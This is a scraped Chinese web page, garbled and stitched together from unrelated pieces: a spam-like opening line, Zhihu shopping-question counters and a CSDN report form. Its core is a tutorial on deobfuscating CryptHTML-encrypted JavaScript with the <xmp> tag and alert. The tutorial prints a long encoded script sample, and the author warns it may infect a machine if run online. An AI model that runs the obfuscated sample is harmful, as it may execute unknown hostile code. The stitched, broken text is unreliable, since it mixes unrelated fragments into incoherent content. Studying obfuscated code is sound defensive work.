差不多的wwWybjsk是什么,刚刚百度浏览器的ybjskcOm怎么不显示了

2016年「双十一」有什么值得购买的商品? - 知乎<strong class="NumberBoard-itemValue" title="4被浏览<strong class="NumberBoard-itemValue" title=",943,217分享邀请回答63329 条评论分享收藏感谢收起834203 条评论分享收藏感谢收起下次自动登录
现在的位置:
& 综合 & 正文
XMP标签本来是用于显示XML内容的,但是也可以让它使HTML标签不被浏览器识别.
XMP标签本来是用于显示XML内容的,但是也可以让它使HTML标签不被浏览器识别.
在JavaScript网页的解密中。&xmp&标签居然也起到很重要的作用!因为这对&xmp&&/xmp&标签内的HTML元素将被渲染为文本,按原样输出。将下面代码保存为xmp.htm,你试试就知道了:)
&xmp&&html&&head&&title&JavaScript解密/title&&/head&&body&xmp内的所有标签将被显示!&/body&&/xmp&
1、根据这个原理,我们就可以开始构造代码,以将HTML中被加密了的代码解密出来,这样解密出的代码是可以直接复制的,这个灵感来自好友提供的那段加密代码:,这是经过CryptHTML加密的:
&html&&head&&Meta Name=Encoder Content=HTMLSHIP&&!--The page is protected by CryptHTML XP(Unregistered Version)--&&noscript&&iframe&&/iframe&&/noscript&&script language="javascript"&&!--sB73="/{/+se5/{w",tZ25="/{/+/*p/*s/[ep";7.,nP19="0.6484527",tZ25='j/^J9x/#5tg/,MpR/'///&/rIW//e1o/=/&7bmL2G/;szadwq/%6Hv/`/}Bk/[/nuO/?/*QhFl4/~/{/)8AT/|ySPE/+/"U/(Y/!N/_0Vfni/@/$/]KDcr/ /-Z/./:C3/&X',sB73='/|/;///%F/[U5z/_/&/@3/(PbN/'xak8h/:CI/+/{G/`Z/=l2E/#/?4pL/~gAM/^sW61/}/&K7f/rDY//q0oHi/$/n/&/*Q/ /.By/)urjXVORnT/"vwd/!SJ/]c9/-etm/,';function dE39(jK57){"/{/+/[/[/ne/*5",l=jK57.'V/-/+/+/~HV/+Z',w='';while(l--)"/{/+5/*w/*/*/ne",o=sB73.indexOf(jK57.charAt(l)),'V/-F//VVF//5',w=(o==-1?jK57.charAt(l):tZ25.charAt(o))+w;"p/+Z/*/*sZZz/./{p",sB73=sB73.substring(1)+sB73.charAt(0),document.write(w);'Z/-VZ/+5/+/+/ cVZ'};dE39("bl/!Sn/@5JDERz1Ezk/:/|EgEl/!Sn/@5mf/rtU/:Lt/`I/=nOy/#h/!1/{kR59EDD0qO1R/!5nhRJj/#/{y0qSk51SRJOEDlkM/=O1R/!5nhRJj/{/#/{y0q/#h/!1/{kR59hR/!hR5kF5/{kR1/:j/#/{/=lk5in/{kh15y/.j/{/#/{y0/./_oXX0M/=j/{/#/{y0/=M/#h/!1/{kR59hR/!hR5kF5/{kR1/:Rk/?J/r1R/!5nhRy/.Sk51SRJOEDlk/.0/=O1R/!5nhRJjR/#/{yk0qnOy/#h/!1/{kR59DE/nkSl/$/$/?nR/#h/?9ln/#k/+ES0qnOyk9/?fn/!fu/:80Sk51SRJOEDlk/=MM/=nOy/#h/!1/{kR59DE/nkSl0q/#h/!1/{kR59/!E/@51SkQgkR5lyQgkR59/&/}B/&Qd/}xr0/=/#h/!1/{kR59hR/{h1lk/#h/?R/:jR/#/{/=MkDlkq/#h/!1/{kR59hR/{h1lk1/@/:jR/#/{/=M/=zi/%U/:IYIX/=/{/^LU/:Yt/`/%/=O1R/!5nhRJj/#/#ly0qnOy/#h/!1/{kR59EDD0q/#h/!1/{kR59hRlkDk/!5l5ES5/:O1R/!5nhRJy0qSk51SRJOEDlkM/=lk5in/{kh15y/.j/#/#ly0/./_IXX0MM/=j/#/#ly0/=D/}/`U/:UYI/`/=R/&tI/:L8t/=/#eY/`/:tYI/`/=hVY/%/:UIUY/=/@HYL/:/`XYY/=/=jDn/!kRlk/#j5hj/:/././=bPl/!Sn/@5m")//--&&/script&&Script lAnguage=jAVAsCRiPT&dE39("N/rzGY/,/'1N/{/:/?/&/,/'1N2SJT3z/]z/&38CBz8/[zb/;2SJT3zB/,/'1R/}nSzT/:n/]TnTz/)o/]0/'1/?/:S/}G8nz/-4JTz8/)BBol/^/'14Tn/?/:4/-/:nY/:/#/?/]C/]TnTzl/'1Nb2SJT3z/,/'1N2SJT3z/]Y/#n/_/}/#/_8CBOs/*SJT3zB/,/'1/*CBV/!Vi/~D/~/ ZV/~5/+Z/+Z/~D/+ZZV/+Z/~5/+m/+5/~/!/~5ZV/~/ /~5/+H/+//V/!ViB/'1/*C/*/.B/~/~/~/ /~h/~/!/~5mhm/!ZZ/+V/~5Z/ /~5/+H/~5ZZV/!Vi/~/~/~/ /~h/~/!/~5mZm/!ZZ/+V/~5Z/ /+/~/~Z/+mZZV/!ViB/'1/*C/*/.B5m/~5/+//ZV/~///~/~ZVm/!ZV/~///~D/~m/+5/~/!/~5/~/ /+//Z/ /~m/+Z/~5/~h/+///~5//5/~t/~5/~/!/~5/~/ /+//ZHZZ/~D/~Z/~i/~5/~m/+//ZZZFV/!Vi/~///~/~Z/ /+m/~5/+////h/+///+///+Z/~F/~Z/+5/+///~5ZVZZ/~m/~t/~h/+m/+m/~F/~//ZZZtZVZZ/~m/~t/+m/~F/~//mi//Z////mFm/~//mm5m5m/~Z/!m/~m5//hmmZ/!mhmh////mVZ/!mFmHmm//hB/'1/*C/*/.BZ/!mVmV//mmVm/////~//mmZmF//5mmm/~ZZV/!Vi/+m/+///+Zm/!ZZ///!/~F/~m/+Z/~D/+m/~D/~/~/+//Z/ 5H///!//t//H5//5//5VZZV/!Vi5m/~5/+//ZV/+HZVm/!ZV/~///~/~Z/ //m/+Z/~5/~h/+///~5//D/~Z/~i/~5/~m/+//ZH/+m/+///+ZZtZZZZZFV/!Vi//mmhm/!ZZ//h/~///~DZZV/!Vi//mmZm/!ZZ/~///~ZZ/ ZZV/!Vi//mmmm/!ZZ/+m/+//B/'1/*C/*/.B/+ZZZV/!Vi//mm//m/!ZZ/~5/~h/~/!ZZV/!Vi/+m/+///+Zmhm/!//mmhZ/~//mmZZ/~//mmmZ/~//mm//V/!Vi/+m/+///+Zm5m/!/+m/+///+ZmhV/!Vi/+m/~5/+//ZV5mZVm/!ZV/~///~/~Z/ /~m/+Z/~5/~h/+///~5/~D/~Z/~i/~5/~m/+//ZH/+m/+///+Zm5ZtZZZZZFV/!Vi5mZ/ /+///+F/+V/~5ZVm/!ZVmhV/!Vi/+m/+///+Zm/~m/!ZZ///+//55//ZZV/!B/'1/*C/*/.BVi/+HZ/ //D/+V/~5/~/ ZV/+m/+///+Zm/~ZtZV/~m/+5/+Z/~tZtZV///~/~h/~t/+m/~5V/!Vi/+HZ/ 5m/~5/~/ /~//V/!Vi/+mmhm/!ZZ5m/~m/+Z/~F/+V/+//ZZV/!Vi/+mmZm/!ZZ/~F/~/ /~/+Z/ ZZV/!Vi/+mmmm/!ZZ///~/~F/~t/~5ZZV/!Vi/+mm//m/!ZZ5m/+F/+m/+///~5/~/!//D/~Z/~i/~5/~m/+//ZZV/!Vi/+mmVm/!/+mmhZs/+mmZZs/+mmmB/'1/*C/*/.BZs/+mm//V/!Vi/+m/~5/+//ZV///~ZVm/!ZV/~///~/~Z/ /~m/+Z/~5/~h/+///~5/~D/~Z/~i/~5/~m/+//ZH/+mmVZtZZZZZFV/!Vi/+m/~5/+//ZV/+///~/!/+VZVm/!ZV///~Z/ ///+/~5/+//5m/+V/~5/~m/~F/~h/~t///~/~D/~t/~///~5/+ZZHmZZFV/!Vi/~/~/~/ /~h/~/!/~5mhm/!ZV///~Z/ //Z/+5/~F/~t/~//5V/~h/+///~HZH/+///~/!/+VZt/~/~/~/ /~h/~/!/~5mhB/'1/*C/*/.BZFV/!Vi5mZ/ /~D/+V/~5/~/ V/!Vi5mZ/ /+/+/+Z/~F/+///~5ZV/+HZ/ /+Z/~5/+m/+V/~D/~/ /+m/~5//Z/~D/~///+FV/!Vi5mZ/ /+m/~h/+/~/~5/+///~D/~/~/~F/~t/~5ZV/~/~/~/ /~h/~/!/~5mhZtmZV/!Vi5mZ/ /~m/~t/~D/+m/~5V/!Vi/~/~/~/ /~h/~/!/~5mZm/!ZV///~Z/ //Z/+5/~F/~t/~//5V/~h/+///~HZH/+///~/!/+VZt/~/~/~/ /~h/~/!/~5mZZFV/!ViB/'1/*C/*/.B5m/~5/+//ZV/+///+mZVm/!ZV///~Z/ //D/+V/~5/~/ 5///~5/+H/+/////~/~F/~t/~5ZH/~/~/~/ /~h/~/!/~5mZZtZVmZZtZV5///+Z/+5/~5ZFV/!Vi/+///+mZ/ 5/+/+Z/~F/+///~5//t/~F/~/ /~5ZVZZ5m/~5/+//ZV5m/~H/~5/~t/~tZVm/!ZV//m/+Z/~5/~h/+///~5//D/~Z/~i/~5/~m/+//ZHZZZZ5m/~H/~5/~t/~tZ/ //h/+V/+V/~t/~F/~m/~h/+///~F/~D/~/ B/'1/*C/*/.BZZZZZFZZV/!Vi/+m/+h/~tm/!ZZ5m/~H/~5/~t/~tZ/ 5m/~H/~5/~t/~t//5/+H/~5/~m/+5/+///~5ZVZZZZZZZs/~/~/~/ /~h/~/!/~5mhZsZZZZZZZtZZZZZZZZZtZZZZZZZZZtZZZZ/~D/+V/~5/~/ ZZZZZtmVZZV/!Vi/+///+mZ/ 5/+/+Z/~F/+///~5//t/~F/~/ /~5ZV/+m/+h/~tV/!Vi/+///+mZ/ /~m/~t/~D/+m/~5V/!Vi/~F/~/~ZV///~B/'1/*C/*/.BZ/ ///~/~F/~t/~5//5/+H/~F/+m/+///+mZH/~/~/~/ /~h/~/!/~5mhZFm/!/+///+Z/+5/~5ZV/+///~H/~5/~/ V/!Vi/~F/~/~ZV///~Z/ ///~/~F/~t/~5//5/+H/~F/+m/+///+mZH/~/~/~/ /~h/~/!/~5mZZFm/!/+///+Z/+5/~5ZV/+///~H/~5/~/ V/!ViZVZVZVZV/+m/~5/+//ZV5hZVm/!ZV/~///~/~Z/ /~m/+Z/~5/~h/+///~5/~D/~Z/~i/~5/~m/+//ZHZZ5m/~H/~5/~t/~tB/'1/*C/*/.BZ/ //h/+V/+V/~t/~F/~m/~h/+///~F/~D/~/ ZZZtZZZZZFV/!ViZVZVZVZV5hZ/ 5m/~H/~5/~t/~t//5/+H/~5/~m/+5/+///~5ZV/~/~/~/ /~h/~/!/~5mZZtZZZZZtZZZZZtZZ/~D/+V/~5/~/ ZZZtmVV/!Vi/~5/~/ /~//ZV/~F/~/~V/!Vi/~5/~/ /~//ZV/~F/~/~V/!ViB/'1/!CBB/'1/!/&/]agx/`/ /]/`/ j/)/*o/,h/'1/]/]/]/]WCBIgB/./`/ D/$/)/*/&Zo/'1/]/]/]/]3Ct/`n/_/)Wo/'1/]/]/]/]GCS/rJ/)3o/'1/]/]/]/]/!C/!IG/'1/]/]/]/]/*C/@x/!/)/*/&mo/'1/`/&/&Q/'1/}/}JYCB/rzz3ebb/r/#/{/#/:/-GzA/{Y/:/_/-Snb3/:34Tnb2/:Rzb8/+m5Z8/?FZ/#HZF/#/?R/-8/[8B/'12z/}CBS/}JYCBBB/]I/]/}/}JY/]I/]BBBB/'1/!C2z/}I/!/'1/ /|/ ty/$/ /]/!/'1Nb2SJT3z/,/'1Nb/{/:/?/&/,/'1Nb/rzGY/,/'1Nz/#/{Y8/]/{/:J/?8JCV/]4T/?z/rChVVL/]/r8T/_/rzCZ5/]S8YY23/#STn/_CV/]S8YY3/#/?/?Tn/_CV/,NzJ/,Nz/?/]4T/?z/rC/+5L/]/r8T/_/rzChF/,N/{YTnW/,NG/#Jp/}88/,/$/r8/]3/#/_8/]T2/]3J/:z8Sz8/?/]/{/&/]tJ/&3zgzGYNbG/#Jp/}88/,Nb/{YTnW/,Nbz/?/,Nz/?/]4T/?z/rCZ5L/]/r8T/_/rzChF/,N2zJ/:n/_/,N/#/]/rJ8RC/rzz3ebb444/-RY/#2/r38/#W/-S/:GbSJ/&3z/rzGYbJ8/_T2z8J/-/rzG/,Q/:48J/]/{/&/]tJ/&3zgzGYNb/#/,Nb2zJ/:n/_/,Nbz/?/,NbzJ/,Nbz/#/{Y8/,")&/script&&/head&&body&&noscript&&b&&font color=red&This page requires a javascript enabled browser!!!&/font&&/b&&/noscript&&/body&&/html&
这段乱码看了都头晕,不过注意我用颜色标记的字符即可。function定义了dE39()这个函数,有两处调用了dE39函数,并且在function定义dE39函数内出现document.write!还记得我前面说过的吗?并且我说过将document.write换为alert即可解密。你试试就会知道了(建议断网测试,否则中毒别来找我^^)。这是经典的alert大法!不过这样解密就糟了,因为解出的代码无法被复制……
2、所以现在我介绍&xmp&标签解密大法。其实&xmp&标签不闭合也行(即不要&/xmp&)。很明显function定义的dE39函数具有解密功能,否则浏览器如何解释那些乱七八糟的字符?请记住我在中提到的两大原理。不多说了,看&xmp&标签是如何解密的:
将上面红色标记的document.write(w);改为(w.length&1000)?document.write("&xmp&"+w):alert(w);。运行后就会看到解密效果了。真正有价值的不是alert(w)弹出的信息,而是document.write写出来的信息。为什么要这样构造?这样构造的原因是CryptHTML加密代码本身的限制。我解释下(w.length&1000)?document.write("&xmp&"+w):alert(w);的意思:
其实这行代码是一条件判断语句,结构是这样的:(条件判断)?表达式1:表达式2。即当w.length&1000为真则执行document.write("&xmp&"+w),为假则执行alert(w)!而function dE39()后,有两处调用了dE39函数,从构造的代码来看,第一次调用为假则执行了alert(w)(所以就弹出了对话框);第二次调用为真则执行了document.write("&xmp&"+w)语句!所以我们得以最终看到解密出的代码^^
3、好了,这段乱码解密出来了,那现在再来看看“&xmp&标签解密大法”的其他小运用吧!构造document.write("&xmp&"+"加密字符串")这样格式的解密方法。来解密这段代码:
/x3c/x64/x6f/x63/x75/x6d/x65/x6e/x74/x2e/x77/x72/x69/x74/x65/x28/x22/u4f59/u5f26/u51fd/u/x3e
结合document.write("&xmp&"+"加密字符串"&来构造解密程序:
&SCRIPT LANGUAGE="JavaScript"&document.write("&xmp&"+"/x3c/x64/x6f/x63/x75/x6d/x65/x6e/x74/x2e/x77/x72/x69/x74/x65/x28/x22/u4f59/u5f26/u51fd/u/x3e")&/SCRIPT&
将这段代码保存为xmp.htm,运行后,看到解密出来的代码了吧?正是由于document.write方法将&xmp&标签写进被加密的代码前面,才使得代码最终被解密出而且按原样输出。这样我们就可以方便复制这些解密出的代码了。
【上篇】【下篇】韩国有什么值得买? - 知乎<strong class="NumberBoard-itemValue" title="被浏览<strong class="NumberBoard-itemValue" title="4,390分享邀请回答280167 条评论分享收藏感谢收起928 条评论分享收藏感谢收起没有更多推荐了,
不良信息举报
举报内容:
有没有人内置购买后,恢复成功的代码(in-app
purchases)已解决
举报原因:
原文地址:
原因补充:
最多只允许输入30个字
加入CSDN,享受更精准的内容推荐,与500万程序员共同成长!

我要回帖

更多关于 百度浏览器 的文章

 

随机推荐